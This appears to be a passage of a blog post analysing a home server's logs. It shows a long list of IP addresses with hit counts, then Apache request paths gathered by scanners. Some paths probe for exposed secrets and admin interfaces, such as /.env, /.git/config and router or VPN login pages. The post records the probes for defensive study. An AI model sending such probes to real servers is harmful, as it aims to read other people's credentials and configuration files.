14 82.102.12.130
13 8.142.171.147
95 8.141.151.124
97 81.145.49.186
72 80.71.149.145
12 80.253.31.232
26 80.249.113.79
14 79.175.189.34
10 79.133.51.211
46 78.187.21.105
16 78.135.88.211
4 78.108.188.12
56 77.87.122.176
11 77.68.117.176
30 77.158.178.46
8 77.105.167.57
22 77.105.147.54
17 74.94.234.151
15 74.208.62.138
16 73.49.216.121
5 72.43.159.250
44 72.167.32.109
17 69.49.247.238
10 69.49.246.187
11 69.165.78.217
32 69.165.78.164
30 68.183.68.187
16 68.183.237.40
47 68.183.108.31
16 68.178.200.48
75 67.207.94.128
17 67.205.188.21
81 65.181.73.155
117 64.226.94.253
16 64.226.70.129
4 62.84.126.112
5 62.84.122.203
5 62.234.190.70
20 61.83.148.111
3 61.185.15.102
66 59.95.147.234
97 59.89.169.138
23 59.103.236.31
13 58.97.168.220
29 58.221.239.72
20 58.210.98.130
39 58.209.234.84
34 54.38.243.250
34 5.253.244.171
22 52.146.46.188
20 5.196.114.220
4 51.91.186.145
32 51.89.254.170
16 51.89.149.153
4 51.79.250.103
20 51.77.245.237
42 51.75.206.129
12 51.68.126.207
20 5.157.107.240
12 51.250.94.177
7 51.250.47.221
11 51.178.30.100
11 51.178.143.50
20 51.161.153.48
11 51.159.29.123
40 50.193.220.21
15 50.114.64.139
16 49.51.253.177
19 49.51.252.120
34 49.51.230.169
71 49.51.204.106
20 49.51.196.102
32 49.51.187.234
84 49.51.173.123
32 49.51.168.185
34 49.51.164.159
15 49.247.146.74
10 49.234.177.73
15 49.232.180.61
21 49.158.80.130
18 47.96.167.251
37 47.93.243.133
17 47.242.112.41
11 47.208.79.133
12 47.120.33.103
22 47.116.195.99
8 47.115.227.66
9 47.109.57.220
99 47.103.61.209
10 47.100.36.225
8 46.105.92.118
6 45.67.216.151
12 45.55.131.143
54 45.249.111.40
22 45.20.209.253
100 45.195.198.85
10 45.192.177.18
32 45.192.176.21
8 45.186.208.46
17 45.180.136.12
9 45.176.31.117
10 45.158.14.145
8 45.154.89.255
3 45.154.89.253
4 45.154.89.252
1 45.154.89.251
4 45.154.89.250
5 45.154.89.246
7 45.154.89.245
65 45.142.122.44
46 45.129.37.236
33 45.128.204.50
3 45.127.45.117
16 45.119.81.249
31 45.118.145.15
21 43.241.132.10
17 43.163.244.31
13 43.163.243.57
28 43.163.239.90
58 43.163.239.82
37 43.163.239.63
17 43.163.238.70
10 43.163.238.62
20 43.163.237.70
12 43.163.237.11
18 43.163.234.47
21 43.163.233.97
14 43.163.232.30
11 43.163.231.91
107 43.163.230.39
49 43.163.226.92
34 43.163.226.88
16 43.163.222.85
12 43.163.222.63
30 43.163.221.25
11 43.163.215.62
17 43.163.214.35
60 43.163.211.93
15 43.163.211.92
4 43.163.210.67
39 43.163.210.57
17 43.163.208.88
8 43.163.207.28
35 43.163.200.19
33 43.163.199.47
14 43.163.199.17
32 43.163.197.63
30 43.163.195.17
6 43.159.59.118
32 43.159.56.191
34 43.159.52.218
33 43.159.45.214
31 43.159.44.223
11 43.159.36.244
28 43.159.35.254
22 43.159.135.77
14 43.159.133.19
12 43.159.132.25
19 43.159.129.59
34 43.157.90.148
38 43.157.89.140
32 43.157.88.116
21 43.157.80.160
14 43.157.80.120
20 43.157.79.252
20 43.157.79.115
12 43.157.65.207
32 43.157.65.101
18 43.157.59.126
34 43.157.45.202
88 43.157.44.160
16 43.157.42.226
123 43.157.34.218
34 43.157.29.254
5 43.157.20.124
19 43.157.182.25
32 43.157.18.191
35 43.157.10.233
19 43.157.10.157
32 43.156.84.147
35 43.156.83.142
12 43.156.77.105
23 43.156.70.152
54 43.156.69.230
15 43.156.64.128
17 43.156.51.227
53 43.156.51.170
14 43.156.51.149
58 43.156.46.179
17 43.156.45.171
12 43.156.44.180
52 43.156.44.115
30 43.156.43.110
16 43.156.40.178
9 43.156.39.228
21 43.156.39.163
42 43.156.37.160
34 43.156.36.219
44 43.156.33.183
33 43.156.29.148
30 43.156.27.150
17 43.156.250.46
15 43.156.236.44
10 43.156.22.213
12 43.156.19.225
17 43.156.18.206
34 43.156.170.69
13 43.156.164.76
12 43.156.15.193
17 43.156.14.158
13 43.156.13.252
40 43.156.128.13
13 43.156.127.43
8 43.156.122.96
20 43.156.112.26
12 43.156.11.155
74 43.156.101.55
69 43.155.186.56
85 43.155.179.36
31 43.155.171.97
16 43.155.171.85
104 43.155.160.46
28 43.155.159.72
8 43.155.157.82
31 43.155.155.43
10 43.155.147.95
34 43.155.140.28
34 43.155.138.12
16 43.154.96.206
33 43.154.235.92
30 43.154.190.47
2 43.154.170.91
14 43.153.97.143
30 43.153.96.249
13 43.153.95.245
14 43.153.94.208
34 43.153.88.185
32 43.153.86.122
32 43.153.83.135
8 43.153.82.175
14 43.153.77.112
35 43.153.76.170
31 43.153.69.156
17 43.153.65.178
34 43.153.60.195
16 43.153.59.228
27 43.153.57.236
30 43.153.56.142
5 43.153.54.175
23 43.153.53.223
11 43.153.53.166
33 43.153.51.250
11 43.153.48.160
15 43.153.37.125
4 43.153.35.217
6 43.153.229.95
32 43.153.226.61
7 43.153.22.117
97 43.153.219.74
9 43.153.213.70
16 43.153.207.95
17 43.153.199.39
110 43.153.192.26
17 43.153.19.215
15 43.153.189.29
121 43.153.184.97
16 43.153.183.77
43 43.153.179.38
17 43.153.178.59
34 43.153.178.48
30 43.153.177.52
21 43.153.173.89
72 43.153.173.17
17 43.153.17.163
12 43.153.17.152
16 43.153.170.99
20 43.153.14.111
15 43.153.113.25
14 43.153.11.127
34 43.153.103.74
12 43.143.176.10
9 43.139.67.191
15 43.139.58.211
11 43.138.54.218
6 43.138.31.228
14 43.138.205.95
6 43.138.16.187
88 43.138.109.80
10 43.137.18.165
32 43.136.240.76
13 43.136.118.68
7 43.136.100.65
33 43.135.48.212
40 43.135.182.15
17 43.135.178.53
16 43.135.164.42
16 43.135.163.21
9 43.135.162.50
19 43.135.140.48
30 43.134.98.122
30 43.134.97.219
19 43.134.96.232
59 43.134.95.210
47 43.134.94.187
20 43.134.92.252
15 43.134.90.124
48 43.134.89.177
32 43.134.87.144
14 43.134.77.142
10 43.134.72.174
13 43.134.70.160
34 43.134.70.144
63 43.134.70.129
21 43.134.69.207
30 43.134.68.235
19 43.134.66.105
21 43.134.64.102
18 43.134.63.221
34 43.134.61.120
9 43.134.59.194
73 43.134.55.199
57 43.134.53.167
25 43.134.51.181
34 43.134.48.214
19 43.134.46.239
115 43.134.46.154
14 43.134.41.100
55 43.134.39.125
11 43.134.35.239
34 43.134.33.118
1 43.134.29.154
49 43.134.27.220
14 43.134.27.153
107 43.134.25.193
29 43.134.25.150
57 43.134.232.46
19 43.134.226.37
32 43.134.226.21
87 43.134.189.26
12 43.134.187.32
15 43.134.187.12
58 43.134.186.38
18 43.134.184.64
16 43.134.181.43
18 43.134.178.78
2 43.134.167.81
18 43.134.164.71
91 43.134.15.218
34 43.134.15.205
4 43.134.15.133
5 43.134.15.112
36 43.134.132.58
18 43.134.116.96
34 43.134.110.31
68 43.134.105.60
7 43.134.105.17
28 43.134.105.15
11 43.134.104.29
3 43.134.103.17
17 43.134.102.98
12 43.134.100.15
34 43.133.77.248
9 43.133.76.228
50 43.133.75.153
9 43.133.74.235
9 43.133.72.133
17 43.133.72.107
6 43.133.71.139
119 43.133.70.124
14 43.133.68.162
17 43.133.63.131
32 43.133.42.162
52 43.133.39.252
19 43.133.38.170
6 43.133.35.141
9 43.133.34.105
30 43.133.32.119
34 43.133.254.39
15 43.133.242.54
16 43.133.237.69
49 43.133.232.30
11 43.133.22.168
32 43.133.212.82
5 43.133.211.94
4 43.133.186.22
12 43.133.141.22
19 43.131.54.174
20 43.131.46.101
29 43.131.36.184
14 43.131.35.115
11 43.131.32.118
17 43.131.30.179
32 43.131.28.209
50 43.131.254.59
32 43.131.235.43
10 43.131.22.216
14 43.131.14.217
22 43.131.13.102
34 43.130.62.221
30 43.130.61.116
25 43.130.53.144
33 43.130.253.72
52 43.130.245.71
44 43.130.16.190
108 43.129.50.235
30 43.128.94.198
49 43.128.88.244
14 43.128.88.156
18 43.128.88.129
33 43.128.79.100
56 43.128.75.168
9 43.128.73.126
15 43.128.72.250
17 43.128.72.119
45 43.128.156.63
23 43.128.131.16
100 43.128.109.21
54 43.128.108.38
12 43.128.105.47
22 43.128.102.58
30 43.128.101.97
29 42.236.120.12
44 42.200.245.36
7 42.192.72.115
15 42.123.126.60
16 41.191.116.18
17 41.175.18.170
16 40.83.182.122
33 39.99.148.161
16 39.109.117.37
19 39.105.47.140
21 39.104.70.153
16 37.59.146.182
108 37.194.206.12
32 36.92.104.229
70 36.138.114.20
12 36.134.134.34
47 35.244.20.156
59 35.229.64.102
30 35.226.126.79
20 35.223.246.35
31 35.207.98.222
8 35.200.165.26
48 35.194.159.73
17 34.92.149.182
32 34.176.48.134
4 34.142.156.17
94 34.131.24.172
12 31.210.220.97
59 31.14.115.193
28 27.155.79.158
21 27.154.63.190
47 23.94.169.133
7 23.94.143.132
14 23.94.136.173
105 220.89.64.174
30 219.92.11.146
14 219.152.54.40
19 218.77.35.197
10 218.153.58.33
33 213.55.93.152
16 212.64.16.191
10 212.60.21.153
32 212.42.97.108
72 211.20.10.199
8 211.137.70.59
18 210.183.21.48
51 210.164.66.50
53 209.97.186.17
14 209.97.179.25
12 209.38.232.83
89 209.14.71.149
2 209.141.59.39
63 209.141.55.77
75 208.109.38.20
20 208.109.37.82
103 20.71.215.181
10 203.194.55.13
10 203.161.59.79
30 203.161.59.55
15 202.83.17.192
34 202.73.99.196
19 202.53.175.36
14 202.51.214.98
15 202.133.89.50
14 20.198.89.167
18 20.169.248.82
13 201.6.254.225
16 201.24.54.213
14 200.60.12.163
17 200.41.150.34
50 200.40.83.186
9 200.137.2.116
14 198.46.210.89
6 198.46.152.29
33 198.12.92.218
10 198.12.71.236
48 198.12.65.156
30 197.5.145.102
30 197.248.56.39
30 197.231.64.64
12 197.227.8.186
9 197.13.31.232
33 196.29.34.170
13 195.87.80.171
34 195.24.56.135
11 195.19.192.34
50 195.178.191.4
197 194.93.25.253
12 194.93.25.245
12 194.156.67.89
13 193.248.45.12
3 193.123.80.55
15 193.107.48.18
4 192.99.247.77
15 192.3.176.170
48 191.98.191.87
50 191.252.111.5
16 191.177.132.4
19 190.85.15.251
32 190.158.9.124
54 190.128.241.2
32 190.12.102.58
28 190.104.3.139
10 189.190.89.23
44 189.11.142.29
146 188.166.47.99
14 188.166.211.7
54 188.121.99.65
94 187.62.88.136
97 187.33.59.176
34 186.64.121.69
30 186.4.206.197
25 186.31.95.163
19 186.28.32.220
15 186.16.41.158
11 186.13.38.139
32 185.78.26.235
10 185.63.113.57
29 185.39.205.34
30 185.29.121.63
14 185.255.90.49
27 185.196.9.160
12 185.191.79.84
16 185.184.223.3
19 185.17.229.65
17 185.100.53.96
16 183.91.186.93
34 182.72.142.62
4 182.61.45.113
79 182.61.37.217
34 182.52.21.251
101 182.44.26.149
30 182.16.245.85
20 181.94.248.33
34 181.171.38.85
20 180.76.202.69
32 180.76.139.58
28 179.32.33.160
12 178.40.121.19
18 178.39.208.10
30 178.253.43.80
14 178.166.6.153
29 178.128.17.50
23 177.73.184.89
29 177.153.69.10
13 175.207.13.86
8 175.203.61.33
119 175.197.77.53
7 175.178.101.2
16 174.138.54.13
6 173.249.10.24
126 172.245.92.68
21 171.244.57.45
20 171.244.37.96
15 171.244.37.93
119 170.78.24.134
14 170.106.84.72
3 170.106.76.62
52 170.106.65.25
14 170.106.52.56
15 170.106.192.5
21 168.232.79.91
51 167.71.51.208
15 167.71.44.206
34 167.71.229.36
17 167.71.205.80
13 167.235.74.81
92 167.172.57.35
51 165.22.59.198
15 165.22.55.227
16 165.22.48.136
19 165.22.217.96
20 165.22.193.26
14 165.22.16.134
122 165.22.101.75
16 165.154.36.71
15 164.92.225.82
8 164.92.209.96
46 164.92.109.62
9 164.177.31.66
16 164.163.98.49
12 162.62.61.159
19 162.62.57.186
34 162.62.55.234
17 162.62.232.71
9 162.62.222.59
19 162.62.217.22
28 162.62.121.22
15 162.240.65.96
14 162.19.153.26
15 161.35.71.130
117 161.35.30.182
34 161.35.213.29
60 161.35.192.95
10 161.35.174.13
4 161.35.122.26
14 160.154.94.42
27 159.65.91.105
17 159.65.220.18
4 159.65.176.56
4 159.65.145.76
4 159.223.5.135
38 159.203.79.94
16 159.196.168.3
34 158.51.99.183
7 157.245.52.79
89 157.245.46.21
44 156.59.75.211
13 156.236.75.85
47 156.236.74.13
95 156.236.73.84
13 156.236.73.61
70 156.236.70.41
8 156.232.11.32
34 156.224.25.68
28 154.8.178.250
13 154.26.134.43
12 154.221.26.21
30 154.221.19.48
33 154.211.15.85
19 154.209.4.193
11 152.32.249.30
51 152.32.199.26
8 152.32.162.18
63 150.95.64.112
8 150.95.27.232
14 150.95.25.178
34 150.109.93.69
96 150.109.25.52
59 150.109.21.98
56 150.109.12.36
15 149.56.45.104
71 147.45.104.27
12 146.59.127.25
33 14.63.221.137
19 146.190.85.49
14 146.190.24.61
32 144.48.240.85
30 14.36.130.250
34 142.93.229.57
32 142.93.151.63
11 142.93.13.232
30 14.225.204.47
20 142.171.72.33
55 14.103.44.165
21 14.103.41.141
52 140.206.48.66
32 139.59.39.160
28 139.59.25.164
6 139.59.251.14
9 139.59.245.64
18 139.59.226.77
30 139.59.188.13
13 139.59.117.68
34 139.59.10.188
86 139.224.60.82
100 139.155.72.97
25 138.68.227.72
13 138.68.163.39
18 138.68.149.40
77 138.197.28.52
16 137.184.76.77
17 137.184.0.163
18 13.68.156.100
38 134.209.156.5
79 134.17.89.151
34 134.122.42.47
19 130.0.177.161
8 129.226.91.47
15 129.226.81.66
64 129.226.215.3
28 129.226.144.4
32 128.199.71.12
33 128.199.39.25
34 128.199.33.46
5 125.88.210.29
21 125.34.90.249
18 125.20.39.107
15 125.160.11.30
14 125.160.11.26
94 124.79.64.137
36 124.45.40.189
32 124.28.218.66
34 124.223.87.69
19 124.223.77.36
29 124.223.156.2
65 124.222.89.71
21 124.222.89.61
96 124.222.4.199
13 124.222.15.56
10 124.221.76.85
12 124.221.242.4
18 124.221.0.129
18 124.156.2.182
9 124.156.211.3
16 124.156.200.8
30 124.156.198.8
16 124.107.34.26
14 123.31.29.192
33 123.30.249.49
32 123.253.35.52
11 123.25.21.101
10 122.51.89.147
14 122.51.25.168
16 122.51.220.44
7 121.46.20.110
12 121.40.56.169
11 121.17.75.174
33 120.78.89.160
12 120.77.178.17
22 120.53.94.178
14 120.48.98.154
8 120.48.66.167
6 120.48.64.183
12 120.48.44.170
15 120.48.179.33
42 120.48.164.59
68 120.48.162.75
8 120.35.26.129
33 119.96.111.55
4 119.91.150.34
11 119.40.89.123
16 119.28.77.167
73 119.28.158.97
94 119.28.156.59
40 119.28.119.81
9 118.89.58.133
18 118.45.205.44
15 118.43.95.157
17 118.25.18.142
11 118.24.89.180
14 118.193.40.60
14 118.193.35.98
19 118.193.35.41
100 118.193.32.61
21 118.193.16.50
17 118.107.1.188
16 117.72.13.136
3 117.50.179.82
81 117.50.157.73
22 117.50.137.84
14 117.50.119.25
14 117.4.245.222
30 117.102.82.13
34 116.67.215.26
31 116.236.187.6
31 116.196.70.16
30 116.1.149.196
41 115.249.54.91
4 115.187.40.33
53 114.96.71.150
94 114.216.4.149
6 113.31.105.94
29 112.91.126.10
10 112.74.175.98
101 1.117.239.152
9 111.67.201.70
13 111.67.194.73
4 1.116.108.203
6 110.67.139.85
30 110.40.155.71
4 109.94.172.86
13 106.75.108.67
13 106.58.175.97
5 106.55.28.146
16 106.55.197.62
32 106.53.139.14
14 106.52.219.95
10 106.52.142.25
8 106.52.132.74
108 106.13.223.14
8 106.12.48.161
1 104.28.228.78
2 104.28.228.77
1 104.28.196.77
9 104.250.50.91
27 104.250.50.63
12 104.250.50.44
18 104.250.50.18
62 104.250.49.72
13 104.250.34.53
3 104.250.34.22
15 104.250.34.19
16 104.248.58.54
19 104.215.4.115
48 104.214.60.77
12 103.92.24.242
15 103.82.145.99
14 103.81.86.208
11 103.77.173.93
15 103.77.172.63
17 103.72.68.138
8 103.67.79.165
9 103.65.235.67
1 103.63.215.82
1 103.63.215.16
22 103.63.108.25
6 103.48.192.48
106 103.24.179.88
32 103.235.34.82
10 103.231.40.36
21 103.226.50.98
13 103.225.13.56
12 103.2.233.237
11 103.176.20.97
34 103.171.84.43
16 103.162.29.83
20 103.154.63.71
9 103.143.72.99
32 103.137.75.74
22 103.10.47.112
6 101.91.190.24
28 101.89.122.34
92 101.43.67.200
16 101.43.32.155
7 101.43.160.57
9 101.43.12.153
11 101.42.52.240
27 101.42.254.78
5 101.42.226.94
11 101.42.224.35
3 101.42.221.51
93 101.42.166.44
16 101.42.161.99
6 101.34.78.223
10 101.34.16.185
13 101.33.73.168
43 101.32.31.213
33 101.32.240.56
32 101.32.141.81
14 101.32.103.80
18 101.126.69.23
29 101.126.3.175
6 97.74.80.116
113 96.84.198.29
34 96.78.175.39
65 96.69.13.140
95 95.90.93.142
37 95.156.96.46
14 91.93.63.184
25 89.46.223.31
114 89.40.206.70
14 89.37.173.89
101 89.211.218.9
4 86.57.244.81
30 85.62.37.186
11 85.198.8.133
4 84.42.28.190
15 84.247.179.0
16 82.212.74.98
20 82.207.8.242
4 82.207.8.194
45 82.196.3.179
42 82.196.1.167
16 8.219.59.194
94 8.219.249.98
65 8.219.183.79
72 8.219.179.36
33 8.218.89.123
34 8.217.209.82
30 8.210.144.58
17 8.208.76.146
7 81.70.55.120
14 81.70.186.78
8 81.70.168.34
8 81.69.21.177
17 81.3.157.110
18 81.192.46.49
12 81.192.46.48
30 81.192.46.38
23 80.66.75.211
11 80.66.75.106
34 78.94.76.242
34 74.48.63.115
19 72.83.65.190
52 72.167.55.58
41 68.183.17.85
30 64.23.188.86
21 64.23.130.10
64 64.226.78.91
23 62.60.143.27
10 61.72.55.130
27 61.7.240.180
15 61.4.102.244
11 60.48.187.82
8 59.6.139.190
59 59.42.214.20
70 59.173.19.44
8 58.96.87.129
18 58.49.26.202
11 58.22.61.221
19 54.37.73.222
13 54.37.12.133
10 52.172.30.44
19 5.196.22.125
16 5.196.100.82
17 51.83.45.112
32 5.182.83.231
5 51.79.55.227
16 51.77.58.143
32 51.75.39.212
6 51.75.22.187
48 51.38.39.235
66 51.38.112.61
14 51.254.85.40
47 51.250.18.92
60 51.178.47.77
17 50.206.19.62
16 50.187.52.54
11 49.51.50.120
60 49.51.253.64
33 49.51.247.39
18 49.51.203.16
15 49.13.76.229
15 47.97.26.145
11 47.93.49.102
19 46.245.64.75
32 46.101.3.129
4 46.101.23.51
19 45.9.149.149
15 45.55.53.166
12 45.43.59.108
12 45.249.79.10
1 45.175.75.60
11 45.159.208.8
15 45.15.159.48
9 45.145.4.186
20 45.121.48.16
50 43.228.85.46
17 43.163.228.2
15 43.163.211.6
34 43.163.194.3
27 43.159.52.31
9 43.159.51.21
34 43.159.49.59
3 43.159.38.60
18 43.159.36.26
15 43.159.35.64
15 43.157.97.60
47 43.157.94.99
95 43.157.90.18
17 43.157.89.22
25 43.157.7.167
14 43.157.65.24
15 43.157.6.144
15 43.157.55.49
33 43.157.52.75
19 43.157.48.47
16 43.157.39.94
32 43.157.32.60
3 43.157.29.75
13 43.157.29.38
34 43.157.27.22
19 43.157.21.15
15 43.157.16.50
16 43.157.1.142
40 43.156.97.98
27 43.156.83.79
15 43.156.8.152
19 43.156.80.15
32 43.156.62.13
16 43.156.42.52
16 43.156.42.38
21 43.156.37.43
123 43.156.33.78
52 43.156.3.149
22 43.156.28.99
14 43.156.19.40
12 43.156.14.20
17 43.156.1.159
15 43.156.0.112
69 43.154.47.21
15 43.153.96.13
30 43.153.94.88
15 43.153.91.23
18 43.153.90.69
34 43.153.90.12
68 43.153.87.16
11 43.153.8.122
16 43.153.77.78
18 43.153.76.36
33 43.153.75.47
12 43.153.74.60
12 43.153.72.68
34 43.153.72.29
16 43.153.66.73
21 43.153.64.49
30 43.153.63.79
15 43.153.62.65
7 43.153.47.81
34 43.153.37.55
9 43.153.27.98
44 43.153.24.65
22 43.153.2.235
38 43.153.20.27
11 43.153.116.2
15 43.142.4.165
10 43.139.87.39
14 43.139.38.20
11 43.139.211.4
13 43.137.42.43
73 43.134.94.87
14 43.134.82.95
14 43.134.74.78
104 43.134.73.13
33 43.134.72.45
16 43.134.7.162
10 43.134.67.44
33 43.134.60.43
34 43.134.58.34
6 43.134.51.31
20 43.134.49.67
119 43.134.41.93
15 43.134.41.36
19 43.134.41.24
17 43.134.3.238
32 43.134.3.225
43 43.134.32.18
17 43.134.26.28
30 43.134.2.164
108 43.133.81.92
34 43.133.80.96
10 43.133.74.95
3 43.133.74.61
6 43.133.67.75
16 43.133.62.48
30 43.133.58.65
27 43.133.42.30
10 43.133.41.19
34 43.133.32.77
34 43.133.3.137
11 43.132.200.4
87 43.131.9.186
15 43.131.61.31
30 43.131.60.40
13 43.131.56.30
63 43.131.45.99
25 43.131.42.60
4 43.131.4.186
129 43.131.32.66
5 43.131.255.3
17 43.131.2.249
16 43.131.16.39
18 43.130.61.37
19 43.130.42.91
24 43.130.42.10
22 43.130.16.82
3 43.129.68.28
30 43.128.87.35
32 43.128.86.28
12 43.128.84.76
9 43.128.84.19
13 42.96.47.162
12 42.51.33.212
15 42.51.22.119
31 42.51.21.126
17 42.51.21.119
10 42.192.40.17
45 4.213.88.220
79 41.66.220.84
7 40.64.56.125
13 39.99.242.64
20 38.99.139.33
16 38.188.248.0
32 37.60.244.16
41 37.32.30.163
43 37.32.15.209
15 37.187.1.241
10 36.71.207.10
11 36.67.70.198
93 36.41.75.226
24 36.153.0.227
11 36.133.115.2
10 35.241.84.62
18 35.131.2.104
17 34.96.239.88
4 34.85.163.94
10 34.29.120.92
53 34.131.203.2
17 31.24.200.23
15 31.220.87.62
9 31.209.49.18
12 2.82.163.214
22 27.72.62.222
20 27.72.46.177
54 27.254.235.4
28 24.69.190.84
16 23.94.57.203
33 23.126.62.36
15 223.17.0.181
18 221.214.2.98
34 221.133.12.6
16 220.88.1.208
27 218.78.46.81
17 212.60.80.58
36 212.12.31.69
30 211.51.96.76
15 211.20.7.217
34 208.81.201.3
33 206.81.26.53
13 206.81.23.41
25 204.48.20.55
54 203.172.76.4
14 202.5.17.125
74 201.249.57.5
5 20.123.24.81
17 200.52.65.20
14 198.23.149.3
32 197.5.145.73
34 197.249.5.16
21 196.20.68.81
88 194.5.176.74
20 193.254.3.18
56 192.99.59.56
19 190.181.4.12
34 190.181.15.3
11 188.18.49.50
10 187.72.57.85
12 187.72.57.83
35 187.45.100.0
33 187.170.18.5
18 186.67.248.8
43 186.67.248.5
18 186.16.42.74
20 185.74.6.243
16 185.74.5.177
23 185.26.32.81
86 185.20.46.33
14 185.126.6.61
101 183.56.226.5
16 182.61.25.91
15 182.42.68.11
13 181.210.8.69
9 180.76.97.63
20 180.76.97.38
95 180.76.36.75
11 179.40.112.6
32 179.1.85.120
17 177.91.80.11
34 177.221.97.5
8 177.115.11.7
11 176.109.0.30
79 175.6.97.174
9 175.6.20.142
21 175.178.3.59
10 168.75.92.86
15 162.62.52.27
32 162.62.226.7
23 162.62.223.9
15 162.14.98.48
15 161.35.66.63
89 161.35.5.255
14 157.230.87.8
23 156.0.255.33
11 1.55.212.112
51 15.235.162.5
50 152.32.217.5
40 152.32.188.4
8 150.158.37.5
12 150.109.5.71
13 14.99.254.18
17 147.45.71.98
16 14.63.62.165
8 14.63.214.22
12 145.255.5.76
34 143.92.62.29
1 143.92.42.65
96 14.29.99.183
14 14.225.19.18
30 14.18.92.211
19 14.18.101.30
34 139.95.8.160
15 139.59.98.42
14 139.59.41.80
96 139.59.31.79
5 139.198.9.32
30 13.77.146.18
32 134.17.16.40
16 129.211.8.58
10 124.222.36.6
28 123.57.26.61
19 121.5.67.173
36 120.77.35.63
4 120.48.95.10
16 120.48.84.73
9 120.48.83.76
14 120.48.2.117
31 120.48.133.5
21 119.91.27.52
4 119.76.33.57
34 118.97.27.98
5 118.89.91.86
4 118.69.80.75
17 117.72.44.30
75 117.72.36.50
9 117.72.14.49
6 117.33.131.6
38 117.27.88.61
14 116.196.86.4
20 115.77.48.83
6 1.15.242.165
91 114.6.31.174
16 111.90.168.2
1 1.116.62.174
14 110.13.51.51
34 110.11.234.8
12 107.173.10.3
15 106.55.54.56
12 106.54.3.193
7 106.13.7.212
1 106.13.14.77
13 105.96.11.65
6 104.250.50.3
2 104.250.50.2
17 104.168.83.5
3 103.96.130.6
12 103.92.47.35
15 103.75.61.44
5 103.55.49.10
17 103.5.133.86
62 103.4.145.50
21 103.37.80.92
27 103.183.4.66
14 103.171.84.7
19 103.170.4.19
15 103.133.36.6
19 101.43.93.18
13 101.43.6.172
13 101.36.105.7
1 101.33.66.20
18 101.32.32.56
29 101.126.3.67
20 98.70.39.73
33 96.67.59.65
14 89.47.53.19
23 86.88.61.99
42 84.73.67.17
17 84.2.226.70
49 82.196.6.71
20 8.219.59.71
1 8.219.239.1
6 81.70.6.206
29 81.69.30.88
14 79.104.0.82
14 77.91.84.54
17 77.83.8.130
16 74.48.9.253
47 71.70.165.8
61 69.49.231.8
18 64.225.54.6
22 63.41.9.210
12 62.72.45.74
9 61.79.189.3
105 61.178.65.2
38 61.171.86.2
34 59.3.76.218
33 58.75.221.5
17 58.56.20.70
16 5.78.106.17
17 54.38.55.13
27 5.42.82.235
19 52.244.67.2
13 5.182.26.91
12 5.157.10.83
68 49.51.36.72
34 49.36.41.21
14 49.0.87.123
15 45.8.229.55
10 45.5.159.36
11 45.5.136.22
14 43.156.8.66
17 43.156.7.94
60 43.156.6.73
16 43.156.6.42
19 43.156.54.8
19 43.156.4.31
18 43.156.3.27
11 43.156.1.71
59 43.153.63.2
17 43.153.30.2
9 43.143.1.22
11 43.134.0.65
43 43.131.6.85
13 36.40.69.55
16 36.137.0.81
5 34.93.7.217
32 31.220.1.41
4 27.71.25.96
18 23.94.92.24
39 23.26.98.51
4 206.81.5.26
106 202.95.6.34
73 200.90.0.10
16 197.5.145.8
48 196.0.120.6
45 195.158.5.3
52 191.252.5.7
13 190.10.8.95
12 189.7.17.61
17 185.74.4.20
14 185.74.4.17
17 181.49.50.6
30 175.24.33.7
4 174.138.6.9
87 155.4.68.48
21 154.68.39.6
21 152.67.97.9
75 150.185.5.5
13 146.56.38.5
6 14.23.44.10
12 14.18.80.12
16 14.139.1.72
12 139.59.64.4
17 138.99.6.74
10 13.70.39.68
10 1.212.65.51
87 121.15.4.92
18 120.71.9.52
4 120.48.9.61
95 117.1.28.51
9 1.15.238.46
31 1.15.122.64
14 1.13.79.144
1 1.12.49.106
15 1.12.255.45
102 1.116.57.91
2 106.13.4.11
37 103.83.5.39
21 103.28.52.6
13 102.53.9.67
6 101.34.44.3
10 95.85.56.9
15 8.219.8.54
8 8.208.23.2
11 79.8.11.76
70 61.155.9.4
33 5.42.95.17
18 5.42.87.71
71 5.42.84.61
58 47.93.5.91
14 45.64.3.61
13 43.163.1.4
20 43.157.9.8
17 43.156.7.9
103 34.81.69.1
33 2.229.2.11
6 2.102.98.3
34 1.9.78.242
27 1.55.33.86
32 12.21.5.10
2 1.116.49.3
32 5.42.78.5
19 189.4.1.6At the Webserver
Additionally I have an Apache web server running. Also there I’m seeing attempts to gain access to the server by hidden admin pages or injection attacks.
docker logs web_app_1 | grep "GET "| awk '{ print $7 }' | sort -u | uniq
/6Jsi
/99vt
/99vu
/aaaaaaaaaaaaaaaaaaaaaaaaaqr
/ab2g
/ab2h
/actuator/gateway/routes
/__Additional
/admin.aspx
/admin.cfmExpand for more
/admin.cgi
/admin.html
/admin.jhtml
/admin.jsa
/admin.jsp
/admin.php
/admin.pl
/admin.shtml
/ajaxpro/core.ashx
/api/session/properties
/api/sonicos/auth
/api/sonicos/tfa
/api/v1
/apps/files_rightclick/js/files.js?v=25c82ac8-0
/apps/files_rightclick/js/script.js?v=25c82ac8-0
/apps/theming/favicon?v=b6589fc6
/apps/theming/icon?v=b6589fc6
/apps/theming/js/theming.js?v=25c82ac8-0
/auth1.html
/auth.html
/axis2/
/axis2-admin/
/axis2/axis2-admin/
/base.cfm
/base.html
/base.inc
/base.jhtml
/base.pl
/cgi-bin/authLogin.cgi
/cgi-bin/config.exp
/cgi-bin/login
/cgi-bin/luci
/cgi-bin/luci/admin
/config.json
/confluence/rest/applinks/1.0/manifest
/core/img/favicon.ico
/core/img/favicon-touch.png
/core/img/manifest.json
/core/js/backgroundjobs.js?v=25c82ac8-0
/core/js/oc.js?v=25c82ac8
/core/l10n/zh_CN.js?v=25c82ac8-0
/+CSCOE+/logon.html
/CSS/Miniweb.css
/custom_apps/collectives/js/collectives-files.js?v=25c82ac8-0
/dana-na/auth/url_default/welcome.cgi
/default.asp
/default.aspx
/default.cfm
/default.cgi
/default.html
/default.jsa
/default.php
/default.pl
/dist/core-common.js?v=25c82ac8-0
/dist/core-files_client.js?v=25c82ac8-0
/dist/core-files_fileinfo.js?v=25c82ac8-0
/dist/core-login.js?v=25c82ac8-0
/dist/core-main.js?v=25c82ac8-0
/dist/files_sharing-main.js?v=25c82ac8-0
/dns-query?name=dnsscan.shadowserver.org&type=A
/docs/cplugError.html/
/.env
/evox/about
/FanG
/favicon/favicon.ico
/favicon.ico
/.ghauri
/ghauri
/.git/config
/.git/HEAD
/global-protect/login.esp
/HNAP1
/home.asp
/home.aspx
/home.cfm
/home.cgi
/home.html
/home.shtml
/index.asp
/index.aspx
/index.cfm
/index.cgi
/index.html
/index.jhtml
/index.jsp
/index.php/avatar/<redacted: username 1>/45
/index.php/avatar/<redacted: username 2>/45?
/index.php/avatar/<redacted: username 2>/45
/index.php/avatar/<redacted: username 2>/45?
